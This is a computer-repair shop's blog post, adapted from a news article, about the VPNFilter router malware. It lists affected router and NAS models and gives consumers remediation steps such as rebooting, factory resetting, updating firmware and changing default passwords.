Skip to content

Russia Router Malware Update

Is your router affected?

Cisco’s Talos has released additional details regarding VPNFilter, including a longer list of affected routers and possible attacks. In a follow-up post, Cisco’s Talos has discovered “a new stage 3 module that injects malicious content into web traffic as it passes through a network device.” Better known as a “man-in-the-middle” attack, this means that the bad guys can use this vulnerability to intercept network traffic and inject malicious code without the user’s knowledge. That means a hacker can manipulate what you see on your screen while still performing malicious tasks on your screen. As Craig Williams, a senior technology leader and global outreach manager at Talos, explained, “They can modify your bank account balance so that it looks normal while at the same time they’re siphoning off money and potentially PGP keys and things like that. They can manipulate everything going in and out of the device.” That’s a much greater threat than initially feared.

Symantec released the following list of routers and NAS devices known to be susceptible to VPNFilter. Some are popular affordable models, and one (the Netgear WNR1000) is provided to Comcast customers in some circumstances.

Affected Routers

Linksys E1200
Linksys E2500
Linksys WRVS4400N
Mikrotik Router OS for Cloud Core Routers: Versions 1016, 1036, and 1072
Netgear DGN2200
Netgear R6400
Netgear R7000
Netgear R8000
Netgear WNR1000
Netgear WNR2000
QNAP TS439 Pro
Other QNAP NAS devices running QTS software
TP-Link R600VPN

The first week of June, Cisco issued a warning that the threat goes beyond even those models and includes a wider swath of routers manufactured by ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE. So once again: The FBI and Cisco suggest that we all reboot our routers, even if it’s not on this list. Rebooting your router eradicates what Cisco calls the “Stage 2” and “Stage 3” elements of VPNFilter—the destructive part of the malware.

What makes VPNFilter so sophisticated is its “Stage 1” element, which can persist even through a reboot and then contact the hackers to reinstall the other stages of the malware.
The only way to fully remove the malware is by performing a factory reset of your router and updating it to the latest firmware revision available, which will protect against known vulnerabilities. It’s a complicated procedure that will require you to reconfigure your network settings, but we’d recommend doing it if your router is on the list of devices known to be vulnerable to VPNFilter. The FBI and some hardware makers also recommend disabling remote management features on your router, which are off by default in most cases. You’ll also want to change your router’s default login credentials, swapping in a strong, unique password—not one you use for any other websites or services.

The exact procedure for resetting a router can vary, for help please contact the techs at Frankenstein Computers and Networking.

Adapted from an article on



Frankenstein Computers has been taking care of our happy clients since 1999. We specialize in IT Support, IT Service, MAC repair, PC Repair, Virus Removal, and much more.  Give us a call for remote support or drop in to drop off.